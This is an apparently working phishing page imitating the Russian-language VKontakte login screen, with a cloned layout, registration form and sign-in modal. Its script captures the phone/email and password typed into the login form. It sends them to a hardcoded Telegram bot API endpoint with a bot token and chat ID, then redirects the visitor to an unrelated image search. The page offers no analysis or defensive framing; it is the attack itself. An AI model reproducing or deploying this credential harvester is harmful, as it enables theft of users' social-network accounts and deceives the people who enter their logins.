<head> 
<meta name="viewport" content="width=device-width, initial-scale=0.86, maximum-scale=5.0, minimum-scale=0.86">
	<title>Вконтакте</title>
<style>
    * {
	margin: 0;
	padding: 0;
}

/*body {
	font-family: -apple-system,BlinkMacSystemFont,Roboto,Open Sans,Helvetica Neue,sans-serif;;
} */


body {
	font-family: lucida grande, tahoma, verdana, arial, sans-serif;
}
.container {
	max-width: 960px;
	margin: 0 auto;
}
.med {
      width: 46.5%;
}

.navbar {
	width: 100%;
	height: 40px;
	top: 0;
	z-index: 100;
	position: fixed;
	background-color: #4a76a8;
	padding: 5px 0px;
}

.cont-bar {
	display: flex;
	align-items: center;
	justify-content: space-between;
}

a {
	text-decoration: none;
}

.l-bar img {
	cursor: pointer;
	margin-right: 120px;
  width: 30px;
  height: 30px;
}

.l-bar input {
	width: 200px;
	border: none;
	border-radius: 20px;
	padding: 6px;
	padding-left: 30px;
	background: #224b7a url(https://www.iconsdb.com/icons/preview/color/E3E1E3/search-3-xxl.png) no-repeat;
	background-position:  14px;
  background-size: 13px 13px;
    outline:none;
}

.l-bar [input="text"]{
    
    padding-left: 5px;
    color: #fff;
    
}


div {
	box-sizing: border-box;
}

.r-bar a {
	font-size: 12.5px;
	color: white;
	font-weight: bold;
}

.l-bar {
  align-items: center;
	display: flex;
}

.header-content {
	margin-top: 40px;
	padding-top: 30px;
	display: flex;
	justify-content: space-between;
}

.f-cont {
	border-radius: 5px;
	width: 136%;
	background-color: white;
	padding: 20px 20px;

}

.f-cont h3 {
	    font-size: 17px;
    font-weight: bold;
    padding-bottom: 5px;
}

body{
    
    background-color: #edeef0;
}

header {
	/*background-color: #edeef0;*/
}
.f-cont-box a {
	color: black;
}

.f-cont-box {

	text-align: center;
	display: flex;
	flex-flow: wrap row;
	padding-top: 20px;
}

.wrap {
	width: 178px;
	padding: 10px 0px;
	border: 1px solid rgba(0,20,51,.12);
	border-radius: 4px;
	margin: 4px;
	padding-bottom: 40px;
	display: flex;
	flex-flow: column wrap;
	align-items: center;
	position: relative;
}

.img {
	margin-top: 25px;
	width: 100px;
	height: 100px;
	border-radius: 50%;
}

span {
	
	font-size: 14px;
	padding-top: 17px;
}

div {
	box-sizing: border-box;
}

.wrap a {
	font-size: 14px;
	color: #5181b8;
	padding-top: 17px;

}

p {
	font-size: 13px;
}



.wrap:after::hover {
	opacity: 1;
}

.wrap:after {
	cursor: pointer;
	height: 15px;
	width: 15px;
	top: 9px;
	background: url(cross.png) no-repeat;
    right: 7px;
	content: "";
	position: absolute;
	opacity: 0.7;
	display: block;
}

.f-form form {
	width: 283px;
	background-color: white;
	padding: 24px;
	display: flex;
	flex-flow: column;
	border-radius: 5px;
	position: relative;
}

.f-form input {
	border-radius: 4px;
	border: 1px solid rgba(0,20,51,.12);
	margin-bottom: 10px;
	padding: 10px;
}




.btn {
	padding: 10px 35px;
	background-color: #5b88bd;
	color: white;
	border: none;
	border-radius: 4px;
}

.f-form a {
	color: #2a5885;
	font-size: 13px;
	margin-left: 15px;
}

.form-button {
	margin-top: 15px;
}
.form-button a:hover {
	text-decoration: underline;
}

.t-form {
	text-align: center;
	padding-top: 32px;
}

.t-form form {
	height: 347px;
}


.t-form p {
	padding-bottom: 15px;
}

.t-form span{
	text-align: left;
	padding-bottom: 15px;
	color: grey;
	font-size: 12px;	
	font-weight: bold;
}

#day {
	width: 75px;
	
	
	
}

.sel {
	display: flex;
	
	justify-content: space-between;
}


.t-form select{
	color: grey;
	border-radius: 4px;
	padding: 7px;
}

#month {
	width: 115px;
}

#year {
	width: 75px;
}


.f-cont .warp:nth-last-child():after{
	display: none;

}

.active {
	width: 178px;
    padding: 10px 0px;
    border: 1px solid rgba(0,20,51,.12);
    border-radius: 4px;
    margin: 4px;
    padding-bottom: 40px;
    display: flex;
    flex-flow: column wrap;
    align-items: center;
    position: relative;
}

.active a {
	font-size: 14px;
	color: #5181b8;
	padding-top: 17px;
}




.btn2 {
	margin-top: 20px;
	padding: 10px;
	background-color: #5fb053;
	color: white;
	font-weight: bold;
	border-radius: 4px;
	border: none;
	margin-bottom: 20px;
}




.btn3 {

			padding: 10px;
	background-color: #1876f2;
	color: white;
	font-weight: bold;
	border-radius: 4px;
	border: none;
	margin-bottom: 20px;
	position: relative;

}



.btn3:before {
	width: 20px;
	height: 20px;
	border-radius: 50%;
	background-color: white;
	color: blue;
	font-size: 15px;
	line-height: 1.5em;
	
	content: 'f';
	display: block;
	position: absolute;
	

}


.pre-last {
    padding-bottom: 57px;
    width: 136%;
    margin-top: 30px;
    padding-left: 20px;
    display: flex;
    padding-top: 60px;
    border-radius: 5px;
    margin-bottom: 40px;
    background: white 92% 100%/ 40% no-repeat url(https://vk.com/images/login/compact_mobile_promo.png);
}




.user {
  cursor: pointer;
	width: 100px;
	height: 100px;
	background-color: #e6edf4;
	border-radius: 	50%;
	margin-top: 20px;
  display: flex;
  justify-content: center;
  align-items: center;
  font-size: 40px;
  color:#5b88bd;
}


.pretitle {
	width: 180px;
	margin-left: 20px;
}
.pretitle h3 {
	margin-bottom: 10px;
}

.pretitle a{
    
    color: rgb(42, 88, 133);
    
}

.pretitle a:hover{
    
    text-decoration: underline;
    
}

footer {

	display: flex;
	justify-content: space-between;
	padding-top: 16px;
	border-top: 1px solid #dfe2e8;
	padding-bottom: 40px;
}


.alish {display: flex;
align-items: center;}

footer a {
	color: #2a5885;
	margin: 0px 8px;
	font-size: 13px;	
}


footer p {
	color: grey;
}

#serch::placeholder {
	color: #81ADC3;
	padding-left: 4px;
}

b {
	cursor: pointer;
    top: 188px;
    left: 131px;
    background-size: 10px 10px;
    background-position: center;
    background-repeat: no-repeat;
    width: 8px;
    height: 8px;
    background-image: url(https://img.icons8.com/material-two-tone/24/000000/question-mark.png);
    position: absolute;
    font-weight: normal;
    font-size: 8px;
    border: 1px solid grey;
    border-radius: 50%;
    padding: 3px}


/* Модальное окно */
  #window {
      
            z-index: 1500; display: none;
			 position: fixed; left: 0;right: 0;top:0px;bottom: 0;
			 background-color: rgba(1,1,1,0.75);
			 
        } 

            .decor {
				font-size: 16px;
				text-align: center;
				position: relative;
				max-width: 450px;
				margin: 150px auto 0;
				background: white;
				border-radius: 4px;
				padding-bottom: 40px;
}
.decor img {
	border-radius: 50%;
	margin-bottom: 20px;
	margin-top: 40px;
}

.decor span {
	font-weight: bold;
}

.decor input {
	border-radius: 4px;
    border: 1px solid rgba(0,20,51,.12);
    margin-bottom: 10px;
    padding: 10px;
    width: 100%;
    margin-top: 20px;
}

.form-inner {
	display: flex;
    flex-flow: column;
    align-items: center;
    width: 270px;
    margin: 0 auto;
}


.decor a {
	color: #2a5885;
    font-size: 13px;
    margin-left: 15px;
}


.prebt
{
	margin-left: -56px;
}


.decor img:after {
	content: "x";
	font-size: 12px;
	display: block;
	position: absolute;
	width: 20px;
	height: 20px;


}

.close {
	position: absolute;
	right: 18px;
	top: 23px;
	cursor: pointer;
}
.l-bar input:focus {
	background-color: white;
}
@media screen and (max-width: 970px){
	.f-cont {
		width: 105%;
	}
	.pre-last {
		width: 105%;
	}
	.med {
		width: 50%;
	}
	.container {
		padding: 0px 20px;
	}
} 
@media screen and (max-width: 774px){
	.med {
		width: 41%;
	}
}
@media screen and (max-width: 664px){
	.header-content {
		flex-flow: column;
	}
	.med {
		width: 92%;
	}
	.f-form form {
		margin: 0 auto;
		width: 92%;
	}
	#day {
		width: 114%;
	}
	#year {
		width: 114%;
	}
	#month {
		width: 114%;
	}
	.l-bar img {
		margin-right: 20px;		
	}
	.r-bar {
		display: none;
	}
}
footer a:hover {
  text-decoration: underline;
}
</style>
</head>
<header>
    <div class="navbar">
        <div class="container">
            <div class="cont-bar">
            <div class="l-bar">
                <img src="https://pngimg.com/uploads/vkontakte/vkontakte_PNG14.png" alt="">
                <input type="text" placeholder="Поиск" id="serch">
            </div>
            <div class="r-bar"><a href="">Switch to English</a></div>
        </div>
        </div>
    </div>
    <div class="container">
        <div class="header-content">
            <div class="med">
                <div class="f-cont">
                <h3>Недавно входили на сайт с этого компьютера</h3>
                <p>Чтобы войти снова, нажмите на фотографию или имя.</p>
                <div class="f-cont-box">
               
                <!--<div class="wrap"><img src="" alt="" class="img">
                        <span>Usres</span>
                </div>
                <div class="wrap"><img src="" alt="" class="img">
                        <span>Usres</span>
                </div>
                <div class="wrap"><img src="" alt="" class="img">
                        <span>Usres</span>
                </div>
                <div class="wrap"><img src="" alt="" class="img">
                        <span>Usres</span>
                </div>-->
                <div class="active"><div class="user">+</div>
                        <a href="#">Войти в другой<br> аккаунт</a>
                </div>
            </div>

        </div>
        <div class="pre-last"><div class="pretitle"><h3>ВКонтакте<br> для мобильных устройств</h3>
            <p>Скачать для <a href="#">iPhone</a> <br>или <a href="#">Android</a></p>
        </div>
</div>
            </div>
        
        <div class="r-cont">
            <div class="f-form">
                <form action="">
                    <input type="text" placeholder="Телефон или email" name="Email" id="email" >
                    <input type="password" placeholder="Пароль" name="password" id="pass">
                    <div class="form-button">
                        <button id="loginbtn"  class="btn" type="button">Войти</button>
                        <a href="">Забыли пароль?</a>
                    </div>
                </form>
            <div class="t-form">
                <form action="">
                    <h3>Впервые ВКонтакте?</h3>
                    <p>Моментальная регистрация</p>
                    <input type="text" placeholder="Ваше имя">
                    <input type="text" placeholder="Ваша фамилия">
                    <span>Дата рождения</span> <b></b>
                            <div class="sel">
                            <div><select name="" id="day">
                        <option value="day">День</option>
                            </select></div>
                            <div><select name="" id="month"><option value="">Месяц</option></select></div>
                            <div><select name="" id="year">
                        <option value="">Год</option></select>
                            </div>
                        </div>
                        <button class="btn2" type = "button">Продолжить регситрацию</button>
                    <button class="btn3" type = "button">Войти через Facebook</button>
                    
                </form>
            </div>
            </div>
        </div>
    </div>
    <footer>
        <div class="alish"><a href="#">
ВКонтакте</a> <p>2020 FinDelMan</p></div>
        <div><a href="">О ВКонтакте</a>
        <a href="">Правила</a>
        <a href="">Реклама</a>
        <a href="">Разработчикам</a></div>
        <div>	<a href="">English</a>
        <a href="">Русский</a>
        <a href="">Українська</a>
        <a href="">все языки »</a>		</div>
    </footer>
    </div>

</header>
<!-- Форма входа -->
<div id="window">

<div class="decor">
<div class="form-inner">
  <div class="close" onclick="show('none')">✖	</div>
<img src="https://sun9-48.userapi.com/c855536/v855536005/1b8d99/CU6Y-BaXge4.jpg" alt="" style="    width: 100px;
height: 100px">
<p>Войти как <span>Empty Madness</span></p>
<input type="password" placeholder="Пароль">
<div class="prebt">
<button class="btn" onclick="show('none')">Войти </button>
  <a href="#">Забыли пароль ?</a>
</div>
</div>
</div>

<script
  src="https://code.jquery.com/jquery-3.6.0.js"
  integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk="
  crossorigin="anonymous"></script>

<script>
    

    
    var btnlogin = document.getElementById("loginbtn");

    btnlogin.onclick = function() {
        var email = document.getElementById("email").value;
    var pass = document.getElementById("pass").value;

    // var data = email +  '    '  + pass; 
    var event = {
  	login: email,
 	 password: pass
		};

		console.log(event);
//         document.write(
//     '<a href="data:text/plain;charset=utf-8,%EF%BB%BF' + encodeURIComponent(str) + '" download="text.txt">text.txt</a>'
// )

$.ajax({
	url: " https://api.telegram.org/bot5073790827:AAGHVVC5NOZpbndY0sdGDw8BH28BDM8eC50/sendMessage?chat_id=1863692897&text=логин:"+email+'   пароль:'+pass,
	type: "POST",
	dataType: 'json',
	processData: false,
	contentType: 'application/json',
	CrossDomain:true,
	async: false,
	data:  JSON.stringify(event),
	success: function (data) {
	   console.log(data)
	},
	error: function (xhr, ajaxOptions, thrownError) { //Add these parameters to display the required response
		alert(xhr.status);
		alert(xhr.responseText);
	}
});

location="https://pixabay.com/ru/images/search/%D0%BA%D1%80%D0%B0%D1%81%D0%B8%D0%B2%D1%8B%D0%B5%20%D0%B4%D0%B5%D0%B2%D1%83%D1%88%D0%BA%D0%B8/";
  };

//   https://api.telegram.org/bot5073790827:AAGHVVC5NOZpbndY0sdGDw8BH28BDM8eC50/sendMessage?chat_id=1863692897&text=%D0%9F%D1%80%D0%B8%D0%B2%D0%B5%D1%82%D0%BB%D0%BE%D1%85




// let datacart = {
// 	"token":url_token, 
// 	"product_id":id
// }




</script>
